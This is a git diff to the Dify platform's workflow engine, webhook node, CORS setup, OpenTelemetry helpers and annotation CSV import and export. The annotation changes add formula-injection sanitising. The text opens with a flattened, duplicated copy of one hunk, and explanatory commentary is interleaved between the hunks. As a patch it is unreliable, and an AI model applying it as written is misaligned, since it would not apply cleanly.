-65,6 +68,7 @@ class WorkerPool: self._graph = graph self._flask_app = flask_app self._context_vars = context_vars + self._layers = layers # Scaling parameters with defaults self._min_workers = min_workers or dify_config.GRAPH_ENGINE_MIN_WORKERS @@ -144,6 +148,7 @@ class WorkerPool: ready_queue=self._ready_queue, event_queue=self._event_queue, graph=self._graph, + layers=self._layers, worker_id=worker_id, flask_app=self._flask_app, context_vars=self._context_vars, diff --git a/api/core/workflow/nodes/base/node.py b/api/core/workflow/nodes/base/node.py index c2e1105971..8ebba3659c 100644 --- a/api/core/workflow/nodes/base/node.py +++ b/api/core/workflow/nodes/base/node.py @@ -244,6 +244,15 @@ class Node(Generic[NodeDataT]): def graph_init_params(self) -> "GraphInitParams": return self._graph_init_params + @property + def execution_id(self) -> str: + return self._node_execution_id + + def ensure_execution_id(self) -> str: + if not self._node_execution_id: + self._node_execution_id = str(uuid4()) + return self._node_execution_id + def _hydrate_node_data(self, data: Mapping[str, Any]) -> NodeDataT: return cast(NodeDataT, self._node_data_type.model_validate(data)) @@ -256,14 +265,12 @@ class Node(Generic[NodeDataT]): raise NotImplementedError def run(self) -> Generator[GraphNodeEventBase, None, None]: - # Generate a single node execution ID to use for 
diff --git a/api/core/workflow/graph_engine/worker_management/worker_pool.py b/api/core/workflow/graph_engine/worker_management/worker_pool.py
index a9aada9ea5..5b9234586b 100644
--- a/api/core/workflow/graph_engine/worker_management/worker_pool.py
+++ b/api/core/workflow/graph_engine/worker_management/worker_pool.py
@@ -14,6 +14,7 @@ from configs import dify_config
 from core.workflow.graph import Graph
 from core.workflow.graph_events import GraphNodeEventBase
 
+from ..layers.base import GraphEngineLayer
 from ..ready_queue import ReadyQueue
 from ..worker import Worker
 
@@ -39,6 +40,7 @@ class WorkerPool:
         ready_queue: ReadyQueue,
         event_queue: queue.Queue[GraphNodeEventBase],
         graph: Graph,
+        layers: list[GraphEngineLayer],
         flask_app: "Flask | None" = None,
         context_vars: "Context | None" = None,
         min_workers: int | None = None,
@@ -53,6 +55,7 @@ class WorkerPool:
             ready_queue: Ready queue for nodes ready for execution
             event_queue: Queue for worker events
             graph: The workflow graph
+            layers: Graph engine layers for node execution hooks
             flask_app: Optional Flask app for context preservation
             context_vars: Optional context variables
             min_workers: Minimum number of workers
@@ -65,6 +68,7 @@ class WorkerPool:
         self._graph = graph
         self._flask_app = flask_app
         self._context_vars = context_vars
+        self._layers = layers
 
         # Scaling parameters with defaults
         self._min_workers = min_workers or dify_config.GRAPH_ENGINE_MIN_WORKERS
@@ -144,6 +148,7 @@
             ready_queue=self._ready_queue,
             event_queue=self._event_queue,
             graph=self._graph,
+            layers=self._layers,
             worker_id=worker_id,
             flask_app=self._flask_app,
             context_vars=self._context_vars,
diff --git a/api/core/workflow/nodes/base/node.py b/api/core/workflow/nodes/base/node.py
index c2e1105971..8ebba3659c 100644
--- a/api/core/workflow/nodes/base/node.py
+++ b/api/core/workflow/nodes/base/node.py
@@ -244,6 +244,15 @@ class Node(Generic[NodeDataT]):
     def graph_init_params(self) -> "GraphInitParams":
         return self._graph_init_params
 
+    @property
+    def execution_id(self) -> str:
+        return self._node_execution_id
+
+    def ensure_execution_id(self) -> str:
+        if not self._node_execution_id:
+            self._node_execution_id = str(uuid4())
+        return self._node_execution_id
+
     def _hydrate_node_data(self, data: Mapping[str, Any]) -> NodeDataT:
         return cast(NodeDataT, self._node_data_type.model_validate(data))
 
@@ -256,14 +265,12 @@
         raise NotImplementedError
 
     def run(self) -> Generator[GraphNodeEventBase, None, None]:
-        # Generate a single node execution ID to use for all events
-        if not self._node_execution_id:
-            self._node_execution_id = str(uuid4())
+        execution_id = self.ensure_execution_id()
         self._start_at = naive_utc_now()
 
         # Create and push start event with required fields
         start_event = NodeRunStartedEvent(
-            id=self._node_execution_id,
+            id=execution_id,
             node_id=self._node_id,
             node_type=self.node_type,
             node_title=self.title,
@@ -321,7 +328,7 @@
             if isinstance(event, NodeEventBase):  # pyright: ignore[reportUnnecessaryIsInstance]
                 yield self._dispatch(event)
             elif isinstance(event, GraphNodeEventBase) and not event.in_iteration_id and not event.in_loop_id:  # pyright: ignore[reportUnnecessaryIsInstance]
-                event.id = self._node_execution_id
+                event.id = self.execution_id
                 yield event
             else:
                 yield event
@@ -333,7 +340,7 @@
                 error_type="WorkflowNodeError",
             )
             yield NodeRunFailedEvent(
-                id=self._node_execution_id,
+                id=self.execution_id,
                 node_id=self._node_id,
                 node_type=self.node_type,
                 start_at=self._start_at,
@@ -512,7 +519,7 @@
         match result.status:
             case WorkflowNodeExecutionStatus.FAILED:
                 return NodeRunFailedEvent(
-                    id=self._node_execution_id,
+                    id=self.execution_id,
                     node_id=self.id,
                     node_type=self.node_type,
                     start_at=self._start_at,
@@ -521,7 +528,7 @@
                 )
             case WorkflowNodeExecutionStatus.SUCCEEDED:
                 return NodeRunSucceededEvent(
-                    id=self._node_execution_id,
+                    id=self.execution_id,
                     node_id=self.id,
                     node_type=self.node_type,
                     start_at=self._start_at,
@@ -537,7 +544,7 @@
     @_dispatch.register
     def _(self, event: StreamChunkEvent) -> NodeRunStreamChunkEvent:
         return NodeRunStreamChunkEvent(
-            id=self._node_execution_id,
+            id=self.execution_id,
             node_id=self._node_id,
             node_type=self.node_type,
             selector=event.selector,
@@ -550,7 +557,7 @@
         match event.node_run_result.status:
             case WorkflowNodeExecutionStatus.SUCCEEDED:
                 return NodeRunSucceededEvent(
-                    id=self._node_execution_id,
+                    id=self.execution_id,
                     node_id=self._node_id,
                     node_type=self.node_type,
                     start_at=self._start_at,
@@ -558,7 +565,7 @@
                 )
             case WorkflowNodeExecutionStatus.FAILED:
                 return NodeRunFailedEvent(
-                    id=self._node_execution_id,
+                    id=self.execution_id,
                     node_id=self._node_id,
                     node_type=self.node_type,
                     start_at=self._start_at,
@@ -573,7 +580,7 @@
     @_dispatch.register
     def _(self, event: PauseRequestedEvent) -> NodeRunPauseRequestedEvent:
         return NodeRunPauseRequestedEvent(
-            id=self._node_execution_id,
+            id=self.execution_id,
             node_id=self._node_id,
             node_type=self.node_type,
             node_run_result=NodeRunResult(status=WorkflowNodeExecutionStatus.PAUSED),
@@ -583,7 +590,7 @@
     @_dispatch.register
     def _(self, event: AgentLogEvent) -> NodeRunAgentLogEvent:
         return NodeRunAgentLogEvent(
-            id=self._node_execution_id,
+            id=self.execution_id,
             node_id=self._node_id,
             node_type=self.node_type,
             message_id=event.message_id,
@@ -599,7 +606,7 @@
     @_dispatch.register
     def _(self, event: LoopStartedEvent) -> NodeRunLoopStartedEvent:
         return NodeRunLoopStartedEvent(
-            id=self._node_execution_id,
+            id=self.execution_id,
             node_id=self._node_id,
             node_type=self.node_type,
             node_title=self.node_data.title,
@@ -612,7 +619,7 @@
     @_dispatch.register
     def _(self, event: LoopNextEvent) -> NodeRunLoopNextEvent:
         return NodeRunLoopNextEvent(
-            id=self._node_execution_id,
+            id=self.execution_id,
             node_id=self._node_id,
             node_type=self.node_type,
             node_title=self.node_data.title,
@@ -623,7 +630,7 @@
     @_dispatch.register
     def _(self, event: LoopSucceededEvent) -> NodeRunLoopSucceededEvent:
         return NodeRunLoopSucceededEvent(
-            id=self._node_execution_id,
+            id=self.execution_id,
             node_id=self._node_id,
             node_type=self.node_type,
             node_title=self.node_data.title,
@@ -637,7 +644,7 @@
     @_dispatch.register
     def _(self, event: LoopFailedEvent) -> NodeRunLoopFailedEvent:
         return NodeRunLoopFailedEvent(
-            id=self._node_execution_id,
+            id=self.execution_id,
             node_id=self._node_id,
             node_type=self.node_type,
             node_title=self.node_data.title,
@@ -652,7 +659,7 @@
     @_dispatch.register
     def _(self, event: IterationStartedEvent) -> NodeRunIterationStartedEvent:
         return NodeRunIterationStartedEvent(
-            id=self._node_execution_id,
+            id=self.execution_id,
             node_id=self._node_id,
             node_type=self.node_type,
             node_title=self.node_data.title,
@@ -665,7 +672,7 @@
     @_dispatch.register
     def _(self, event: IterationNextEvent) -> NodeRunIterationNextEvent:
         return NodeRunIterationNextEvent(
-            id=self._node_execution_id,
+            id=self.execution_id,
             node_id=self._node_id,
             node_type=self.node_type,
             node_title=self.node_data.title,
@@ -676,7 +683,7 @@
     @_dispatch.register
     def _(self, event: IterationSucceededEvent) -> NodeRunIterationSucceededEvent:
         return NodeRunIterationSucceededEvent(
-            id=self._node_execution_id,
+            id=self.execution_id,
             node_id=self._node_id,
             node_type=self.node_type,
             node_title=self.node_data.title,
@@ -690,7 +697,7 @@
     @_dispatch.register
    def _(self, event: IterationFailedEvent) -> NodeRunIterationFailedEvent:
         return NodeRunIterationFailedEvent(
-            id=self._node_execution_id,
+            id=self.execution_id,
             node_id=self._node_id,
             node_type=self.node_type,
             node_title=self.node_data.title,
@@ -705,7 +712,7 @@
     @_dispatch.register
     def _(self, event: RunRetrieverResourceEvent) -> NodeRunRetrieverResourceEvent:
         return NodeRunRetrieverResourceEvent(
-            id=self._node_execution_id,
+            id=self.execution_id,
             node_id=self._node_id,
             node_type=self.node_type,
             retriever_resources=event.retriever_resources,
diff --git a/api/core/workflow/nodes/trigger_webhook/node.py b/api/core/workflow/nodes/trigger_webhook/node.py
index 3631c8653d..ec8c4b8ee3 100644
--- a/api/core/workflow/nodes/trigger_webhook/node.py
+++ b/api/core/workflow/nodes/trigger_webhook/node.py
@@ -1,14 +1,22 @@
+import logging
 from collections.abc import Mapping
 from typing import Any
 
+from core.file import FileTransferMethod
+from core.variables.types import SegmentType
+from core.variables.variables import FileVariable
 from core.workflow.constants import SYSTEM_VARIABLE_NODE_ID
 from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
 from core.workflow.enums import NodeExecutionType, NodeType
 from core.workflow.node_events import NodeRunResult
 from core.workflow.nodes.base.node import Node
+from factories import file_factory
+from factories.variable_factory import build_segment_with_type
 
 from .entities import ContentType, WebhookData
 
+logger = logging.getLogger(__name__)
+
 
 class TriggerWebhookNode(Node[WebhookData]):
     node_type = NodeType.TRIGGER_WEBHOOK
@@ -60,6 +68,34 @@ ...
             outputs=outputs,
         )
 
+    def generate_file_var(self, param_name: str, file: dict) -> FileVariable | None:
+        related_id = file.get("related_id")
+        transfer_method_value = file.get("transfer_method")
+        if transfer_method_value:
+            transfer_method = FileTransferMethod.value_of(transfer_method_value)
+            match transfer_method:
+                case FileTransferMethod.LOCAL_FILE | FileTransferMethod.REMOTE_URL:
+                    file["upload_file_id"] = related_id
+                case FileTransferMethod.TOOL_FILE:
+                    file["tool_file_id"] = related_id
+                case FileTransferMethod.DATASOURCE_FILE:
+                    file["datasource_file_id"] = related_id
+
+        try:
+            file_obj = file_factory.build_from_mapping(
+                mapping=file,
+                tenant_id=self.tenant_id,
+            )
+            file_segment = build_segment_with_type(SegmentType.FILE, file_obj)
+            return FileVariable(name=param_name, value=file_segment.value, selector=[self.id, param_name])
+        except ValueError:
+            logger.error(
+                "Failed to build FileVariable for webhook file parameter %s",
+                param_name,
+                exc_info=True,
+            )
+            return None
+
     def _extract_configured_outputs(self, webhook_inputs: dict[str, Any]) -> dict[str, Any]:
         """Extract outputs based on node configuration from webhook inputs."""
         outputs = {}
@@ -107,18 +143,33 @@
                     outputs[param_name] = str(webhook_data.get("body", {}).get("raw", ""))
                     continue
                 elif self.node_data.content_type == ContentType.BINARY:
-                    outputs[param_name] = webhook_data.get("body", {}).get("raw", b"")
+                    raw_data: dict = webhook_data.get("body", {}).get("raw") or {}
+                    file_var = self.generate_file_var(param_name, raw_data) if raw_data else None
+                    if file_var:
+                        outputs[param_name] = file_var
+                    else:
+                        outputs[param_name] = raw_data
                     continue
 
             if param_type == "file":
                 # Get File object (already processed by webhook controller)
-                file_obj = webhook_data.get("files", {}).get(param_name)
-                outputs[param_name] = file_obj
+                files = webhook_data.get("files", {})
+                if files and isinstance(files, dict):
+                    file = files.get(param_name)
+                    if file and isinstance(file, dict):
+                        file_var = self.generate_file_var(param_name, file)
+                        if file_var:
+                            outputs[param_name] = file_var
+                        else:
+                            outputs[param_name] = files
+                    else:
+                        outputs[param_name] = files
+                else:
+                    outputs[param_name] = files
             else:
                 # Get regular body parameter
                 outputs[param_name] = webhook_data.get("body", {}).get(param_name)
 
         # Include raw webhook data for debugging/advanced use
         outputs["_webhook_raw"] = webhook_data
-
         return outputs
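To make the mapping contract concrete, here is the rough shape of the dict `generate_file_var` expects from the webhook controller. Only `transfer_method` and `related_id` are taken from the code above; the remaining keys are illustrative assumptions about what `file_factory.build_from_mapping` consumes:

```python
# Hypothetical payload for a tool-managed file; generate_file_var copies
# related_id into the transfer-method-specific key (tool_file_id here)
# before handing the mapping to file_factory.build_from_mapping().
file_mapping = {
    "transfer_method": "tool_file",
    "related_id": "c0ffee00-0000-0000-0000-000000000000",  # becomes tool_file_id
    "type": "document",        # assumed field
    "filename": "report.pdf",  # assumed field
}
```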
diff --git a/api/core/workflow/workflow_entry.py b/api/core/workflow/workflow_entry.py
index d4ec29518a..ddf545bb34 100644
--- a/api/core/workflow/workflow_entry.py
+++ b/api/core/workflow/workflow_entry.py
@@ -14,7 +14,7 @@ from core.workflow.errors import WorkflowNodeRunFailedError
 from core.workflow.graph import Graph
 from core.workflow.graph_engine import GraphEngine
 from core.workflow.graph_engine.command_channels import InMemoryChannel
-from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer
+from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer, ObservabilityLayer
 from core.workflow.graph_engine.protocols.command_channel import CommandChannel
 from core.workflow.graph_events import GraphEngineEvent, GraphNodeEventBase, GraphRunFailedEvent
 from core.workflow.nodes import NodeType
@@ -23,6 +23,7 @@ from core.workflow.nodes.node_mapping import NODE_TYPE_CLASSES_MAPPING
 from core.workflow.runtime import GraphRuntimeState, VariablePool
 from core.workflow.system_variable import SystemVariable
 from core.workflow.variable_loader import DUMMY_VARIABLE_LOADER, VariableLoader, load_into_variable_pool
+from extensions.otel.runtime import is_instrument_flag_enabled
 from factories import file_factory
 from models.enums import UserFrom
 from models.workflow import Workflow
@@ -98,6 +99,10 @@
             )
             self.graph_engine.layer(limits_layer)
 
+        # Add observability layer when OTel is enabled
+        if dify_config.ENABLE_OTEL or is_instrument_flag_enabled():
+            self.graph_engine.layer(ObservabilityLayer())
+
     def run(self) -> Generator[GraphEngineEvent, None, None]:
         graph_engine = self.graph_engine
diff --git a/api/events/event_handlers/clean_when_dataset_deleted.py b/api/events/event_handlers/clean_when_dataset_deleted.py
index 1666e2e29f..d6007662d8 100644
--- a/api/events/event_handlers/clean_when_dataset_deleted.py
+++ b/api/events/event_handlers/clean_when_dataset_deleted.py
@@ -15,4 +15,5 @@ def handle(sender: Dataset, **kwargs):
         dataset.index_struct,
         dataset.collection_binding_id,
         dataset.doc_form,
+        dataset.pipeline_id,
     )
diff --git a/api/extensions/ext_blueprints.py b/api/extensions/ext_blueprints.py
index 725e5351e6..cf994c11df 100644
--- a/api/extensions/ext_blueprints.py
+++ b/api/extensions/ext_blueprints.py
@@ -9,11 +9,21 @@
 FILES_HEADERS: tuple[str, ...] = (*BASE_CORS_HEADERS, HEADER_NAME_CSRF_TOKEN)
 
 EXPOSED_HEADERS: tuple[str, ...] = ("X-Version", "X-Env", "X-Trace-Id")
 
 
-def init_app(app: DifyApp):
-    # register blueprint routers
+def _apply_cors_once(bp, /, **cors_kwargs):
+    """Make CORS idempotent so blueprints can be reused across multiple app instances."""
+
+    if getattr(bp, "_dify_cors_applied", False):
+        return
 
     from flask_cors import CORS
 
+    CORS(bp, **cors_kwargs)
+    bp._dify_cors_applied = True
+
+
+def init_app(app: DifyApp):
+    # register blueprint routers
+
     from controllers.console import bp as console_app_bp
     from controllers.files import bp as files_bp
     from controllers.inner_api import bp as inner_api_bp
@@ -22,7 +32,7 @@
     from controllers.service_api import bp as service_api_bp
     from controllers.trigger import bp as trigger_bp
     from controllers.web import bp as web_bp
 
-    CORS(
+    _apply_cors_once(
         service_api_bp,
         allow_headers=list(SERVICE_API_HEADERS),
         methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"],
     )
     app.register_blueprint(service_api_bp)
 
-    CORS(
+    _apply_cors_once(
         web_bp,
         resources={r"/*": {"origins": dify_config.WEB_API_CORS_ALLOW_ORIGINS}},
         supports_credentials=True,
@@ -30,7 +40,7 @@
     )
     app.register_blueprint(web_bp)
 
-    CORS(
+    _apply_cors_once(
         console_app_bp,
         resources={r"/*": {"origins": dify_config.CONSOLE_CORS_ALLOW_ORIGINS}},
         supports_credentials=True,
@@ -40,7 +50,7 @@
     )
     app.register_blueprint(console_app_bp)
 
-    CORS(
+    _apply_cors_once(
         files_bp,
         allow_headers=list(FILES_HEADERS),
         methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"],
@@ -50,7 +60,7 @@
@@ -62,7 +72,7 @@
     app.register_blueprint(mcp_bp)
 
     # Register trigger blueprint with CORS for webhook calls
-    CORS(
+    _apply_cors_once(
         trigger_bp,
         allow_headers=["Content-Type", "Authorization", "X-App-Code"],
         methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH", "HEAD"],
diff --git a/api/extensions/ext_session_factory.py b/api/extensions/ext_session_factory.py
new file mode 100644
index 0000000000..0eb43d66f4
--- /dev/null
+++ b/api/extensions/ext_session_factory.py
@@ -0,0 +1,7 @@
+from core.db.session_factory import configure_session_factory
+from extensions.ext_database import db
+
+
+def init_app(app):
+    with app.app_context():
+        configure_session_factory(db.engine)
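A quick sketch of why the guard matters: blueprints are module-level singletons, so registering them on a second app instance (for example in tests) used to re-apply CORS to the same blueprint. Assuming only the behavior shown above:

```python
from flask import Blueprint

from extensions.ext_blueprints import _apply_cors_once

bp = Blueprint("demo", __name__)
_apply_cors_once(bp, supports_credentials=True)  # applies flask_cors.CORS once
_apply_cors_once(bp, supports_credentials=True)  # no-op thanks to the _dify_cors_applied flag
assert getattr(bp, "_dify_cors_applied", False) is True
```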
diff --git a/api/extensions/otel/decorators/base.py b/api/extensions/otel/decorators/base.py
index 9604a3b6d5..14221d24dd 100644
--- a/api/extensions/otel/decorators/base.py
+++ b/api/extensions/otel/decorators/base.py
@@ -1,5 +1,4 @@
 import functools
-import os
 from collections.abc import Callable
 from typing import Any, TypeVar, cast
 
@@ -7,22 +6,13 @@ from opentelemetry.trace import get_tracer
 
 from configs import dify_config
 from extensions.otel.decorators.handler import SpanHandler
+from extensions.otel.runtime import is_instrument_flag_enabled
 
 T = TypeVar("T", bound=Callable[..., Any])
 
 _HANDLER_INSTANCES: dict[type[SpanHandler], SpanHandler] = {SpanHandler: SpanHandler()}
 
 
-def _is_instrument_flag_enabled() -> bool:
-    """
-    Check if external instrumentation is enabled via environment variable.
-
-    Third-party non-invasive instrumentation agents set this flag to coordinate
-    with Dify's manual OpenTelemetry instrumentation.
-    """
-    return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true"
-
-
 def _get_handler_instance(handler_class: type[SpanHandler]) -> SpanHandler:
     """Get or create a singleton instance of the handler class."""
     if handler_class not in _HANDLER_INSTANCES:
@@ -43,7 +33,7 @@ def trace_span(handler_class: type[SpanHandler] | None = None) -> Callable[[T],
     def decorator(func: T) -> T:
         @functools.wraps(func)
         def wrapper(*args: Any, **kwargs: Any) -> Any:
-            if not (dify_config.ENABLE_OTEL or _is_instrument_flag_enabled()):
+            if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()):
                 return func(*args, **kwargs)
 
             handler = _get_handler_instance(handler_class or SpanHandler)
diff --git a/api/extensions/otel/runtime.py b/api/extensions/otel/runtime.py
index 16f5ccf488..a7181d2683 100644
--- a/api/extensions/otel/runtime.py
+++ b/api/extensions/otel/runtime.py
@@ -1,4 +1,5 @@
 import logging
+import os
 import sys
 from typing import Union
 
@@ -71,3 +72,13 @@ def init_celery_worker(*args, **kwargs):
         if dify_config.DEBUG:
             logger.info("Initializing OpenTelemetry for Celery worker")
         CeleryInstrumentor(tracer_provider=tracer_provider, meter_provider=metric_provider).instrument()
+
+
+def is_instrument_flag_enabled() -> bool:
+    """
+    Check if external instrumentation is enabled via environment variable.
+
+    Third-party non-invasive instrumentation agents set this flag to coordinate
+    with Dify's manual OpenTelemetry instrumentation.
+    """
+    return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true"
diff --git a/api/factories/file_factory.py b/api/factories/file_factory.py
index 737a79f2b0..bd71f18af2 100644
--- a/api/factories/file_factory.py
+++ b/api/factories/file_factory.py
@@ -1,3 +1,4 @@
+import logging
 import mimetypes
 import os
 import re
@@ -17,6 +18,8 @@ from core.helper import ssrf_proxy
 from extensions.ext_database import db
 from models import MessageFile, ToolFile, UploadFile
 
+logger = logging.getLogger(__name__)
+
 
 def build_from_message_files(
     *,
@@ -356,15 +359,20 @@ def _build_from_tool_file(
     transfer_method: FileTransferMethod,
     strict_type_validation: bool = False,
 ) -> File:
+    # Resolve the tool file id up front so the lookup and error reporting stay consistent
+    tool_file_id = mapping.get("tool_file_id")
+
+    if not tool_file_id:
+        raise ValueError("tool_file_id is required to build a tool file")
     tool_file = db.session.scalar(
         select(ToolFile).where(
-            ToolFile.id == mapping.get("tool_file_id"),
+            ToolFile.id == tool_file_id,
             ToolFile.tenant_id == tenant_id,
         )
     )
 
     if tool_file is None:
-        raise ValueError(f"ToolFile {mapping.get('tool_file_id')} not found")
+        raise ValueError(f"ToolFile {tool_file_id} not found")
 
     extension = "." + tool_file.file_key.split(".")[-1] if "." in tool_file.file_key else ".bin"
@@ -402,10 +410,13 @@ def _build_from_datasource_file(
     transfer_method: FileTransferMethod,
     strict_type_validation: bool = False,
 ) -> File:
+    datasource_file_id = mapping.get("datasource_file_id")
+    if not datasource_file_id:
+        raise ValueError("datasource_file_id is required to build a datasource file")
     datasource_file = (
         db.session.query(UploadFile)
         .where(
-            UploadFile.id == mapping.get("datasource_file_id"),
+            UploadFile.id == datasource_file_id,
             UploadFile.tenant_id == tenant_id,
         )
         .first()
diff --git a/api/libs/encryption.py b/api/libs/encryption.py
new file mode 100644
index 0000000000..81be8cce97
--- /dev/null
+++ b/api/libs/encryption.py
@@ -0,0 +1,66 @@
+"""
+Field Encoding/Decoding Utilities
+
+Provides Base64 decoding for sensitive fields (password, verification code)
+received from the frontend.
+
+Note: This uses Base64 encoding for obfuscation, not cryptographic encryption.
+Real security relies on HTTPS for transport layer encryption.
+"""
+
+import base64
+import logging
+
+logger = logging.getLogger(__name__)
+
+
+class FieldEncryption:
+    """Handle decoding of sensitive fields during transmission"""
+
+    @classmethod
+    def decrypt_field(cls, encoded_text: str) -> str | None:
+        """
+        Decode Base64 encoded field from frontend.
+
+        Args:
+            encoded_text: Base64 encoded text from frontend
+
+        Returns:
+            Decoded plaintext, or None if decoding fails
+        """
+        try:
+            # Decode base64
+            decoded_bytes = base64.b64decode(encoded_text)
+            decoded_text = decoded_bytes.decode("utf-8")
+            logger.debug("Field decoding successful")
+            return decoded_text
+
+        except Exception:
+            # Decoding failed - return None to trigger error in caller
+            return None
+
+    @classmethod
+    def decrypt_password(cls, encrypted_password: str) -> str | None:
+        """
+        Base64-decode the password field (obfuscation only, not encryption)
+
+        Args:
+            encrypted_password: Base64-encoded password from frontend
+
+        Returns:
+            Decoded password or None if decoding fails
+        """
+        return cls.decrypt_field(encrypted_password)
+
+    @classmethod
+    def decrypt_verification_code(cls, encrypted_code: str) -> str | None:
+        """
+        Base64-decode the verification code field (obfuscation only, not encryption)
+
+        Args:
+            encrypted_code: Base64-encoded code from frontend
+
+        Returns:
+            Decoded code or None if decoding fails
+        """
+        return cls.decrypt_field(encrypted_code)
diff --git a/api/libs/helper.py b/api/libs/helper.py
index abc81d1fde..4a7afe0bda 100644
--- a/api/libs/helper.py
+++ b/api/libs/helper.py
@@ -184,7 +184,7 @@ def timezone(timezone_string):
 def convert_datetime_to_date(field, target_timezone: str = ":tz"):
     if dify_config.DB_TYPE == "postgresql":
         return f"DATE(DATE_TRUNC('day', {field} AT TIME ZONE 'UTC' AT TIME ZONE {target_timezone}))"
-    elif dify_config.DB_TYPE == "mysql":
+    elif dify_config.DB_TYPE in ["mysql", "oceanbase", "seekdb"]:
         return f"DATE(CONVERT_TZ({field}, 'UTC', {target_timezone}))"
     else:
         raise NotImplementedError(f"Unsupported database type: {dify_config.DB_TYPE}")
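For reference, the dialect branch above is typically consumed by interpolating the returned SQL fragment into a larger statement, with `:tz` left as a bind parameter. A hedged sketch (the `messages` table and timezone value are illustrative):

```python
from sqlalchemy import text

from libs.helper import convert_datetime_to_date

# ":tz" inside the generated fragment is a bind-parameter placeholder,
# so the timezone is supplied safely at execution time.
day_expr = convert_datetime_to_date("created_at")
stmt = text(f"SELECT {day_expr} AS day, COUNT(*) AS n FROM messages GROUP BY day").bindparams(
    tz="Asia/Shanghai"
)
```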
diff --git a/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py b/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py
new file mode 100644
index 0000000000..2bdd430e81
--- /dev/null
+++ b/api/migrations/versions/2025_12_16_1817-03ea244985ce_add_type_column_not_null_default_tool.py
@@ -0,0 +1,31 @@
+"""add type column not null default tool
+
+Revision ID: 03ea244985ce
+Revises: d57accd375ae
+Create Date: 2025-12-16 18:17:12.193877
+
+"""
+from alembic import op
+import models as models
+import sqlalchemy as sa
+from sqlalchemy.dialects import postgresql
+
+# revision identifiers, used by Alembic.
+revision = '03ea244985ce'
+down_revision = 'd57accd375ae'
+branch_labels = None
+depends_on = None
+
+
+def upgrade():
+    # ### commands auto generated by Alembic - please adjust! ###
+    with op.batch_alter_table('pipeline_recommended_plugins', schema=None) as batch_op:
+        batch_op.add_column(sa.Column('type', sa.String(length=50), server_default=sa.text("'tool'"), nullable=False))
+    # ### end Alembic commands ###
+
+
+def downgrade():
+    # ### commands auto generated by Alembic - please adjust! ###
+    with op.batch_alter_table('pipeline_recommended_plugins', schema=None) as batch_op:
+        batch_op.drop_column('type')
+    # ### end Alembic commands ###
diff --git a/api/models/dataset.py b/api/models/dataset.py
index ba2eaf6749..445ac6086f 100644
--- a/api/models/dataset.py
+++ b/api/models/dataset.py
@@ -1532,6 +1532,7 @@ class PipelineRecommendedPlugin(TypeBase):
     )
     plugin_id: Mapped[str] = mapped_column(LongText, nullable=False)
     provider_name: Mapped[str] = mapped_column(LongText, nullable=False)
+    type: Mapped[str] = mapped_column(sa.String(50), nullable=False, server_default=sa.text("'tool'"))
     position: Mapped[int] = mapped_column(sa.Integer, nullable=False, default=0)
     active: Mapped[bool] = mapped_column(sa.Boolean, nullable=False, default=True)
     created_at: Mapped[datetime] = mapped_column(
diff --git a/api/pyproject.toml b/api/pyproject.toml
index 092b5ab9f9..4fbd7433d1 100644
--- a/api/pyproject.toml
+++ b/api/pyproject.toml
@@ -216,6 +216,7 @@ vdb = [
    "pymochow==2.2.9",
    "pyobvector~=0.2.17",
    "qdrant-client==1.9.0",
+   "intersystems-irispython>=5.1.0",
    "tablestore==6.3.7",
    "tcvectordb~=1.6.4",
    "tidb-vector==0.0.9",
diff --git a/api/pytest.ini b/api/pytest.ini
index afb53b47cc..4a9470fa0c 100644
--- a/api/pytest.ini
+++ b/api/pytest.ini
@@ -1,5 +1,5 @@
 [pytest]
-addopts = --cov=./api --cov-report=json --cov-report=xml
+addopts = --cov=./api --cov-report=json
 env =
     ANTHROPIC_API_KEY = sk-ant-api11-IamNotARealKeyJustForMockTestKawaiiiiiiiiii-NotBaka-ASkksz
     AZURE_OPENAI_API_BASE = https://difyai-openai.openai.azure.com
diff --git a/api/services/annotation_service.py b/api/services/annotation_service.py
index 9258def907..d03cbddceb 100644
--- a/api/services/annotation_service.py
+++ b/api/services/annotation_service.py
@@ -1,10 +1,14 @@
+import logging
 import uuid
 
 import pandas as pd
+
+logger = logging.getLogger(__name__)
 from sqlalchemy import or_, select
 from werkzeug.datastructures import FileStorage
 from werkzeug.exceptions import NotFound
 
+from core.helper.csv_sanitizer import CSVSanitizer
 from extensions.ext_database import db
 from extensions.ext_redis import redis_client
 from libs.datetime_utils import naive_utc_now
@@ -155,6 +159,12 @@
 
     @classmethod
     def export_annotation_list_by_app_id(cls, app_id: str):
+        """
+        Export all annotations for an app with CSV injection protection.
+
+        Sanitizes question and content fields to prevent formula injection attacks
+        when exported to CSV format.
+ """ # get app info _, current_tenant_id = current_account_with_tenant() app = ( @@ -171,6 +181,16 @@ class AppAnnotationService: .order_by(MessageAnnotation.created_at.desc()) .all() ) + + # Sanitize CSV-injectable fields to prevent formula injection + for annotation in annotations: + # Sanitize question field if present + if annotation.question: + annotation.question = CSVSanitizer.sanitize_value(annotation.question) + # Sanitize content field (answer) + if annotation.content: + annotation.content = CSVSanitizer.sanitize_value(annotation.content) + return annotations @classmethod @@ -330,6 +350,18 @@ class AppAnnotationService: @classmethod def batch_import_app_annotations(cls, app_id, file: FileStorage): + """ + Batch import annotations from CSV file with enhanced security checks. + + Security features: + - File size validation + - Row count limits (min/max) + - Memory-efficient CSV parsing + - Subscription quota validation + - Concurrency tracking + """ + from configs import dify_config + # get app info current_user, current_tenant_id = current_account_with_tenant() app = ( @@ -341,16 +373,80 @@ class AppAnnotationService: if not app: raise NotFound("App not found") + job_id: str | None = None # Initialize to avoid unbound variable error try: - # Skip the first row - df = pd.read_csv(file.stream, dtype=str) - result = [] - for _, row in df.iterrows(): - content = {"question": row.iloc[0], "answer": row.iloc[1]} + # Quick row count check before full parsing (memory efficient) + # Read only first chunk to estimate row count + file.stream.seek(0) + first_chunk = file.stream.read(8192) # Read first 8KB + file.stream.seek(0) + + # Estimate row count from first chunk + newline_count = first_chunk.count(b"\n") + if newline_count == 0: + raise ValueError("The CSV file appears to be empty or invalid.") + + # Parse 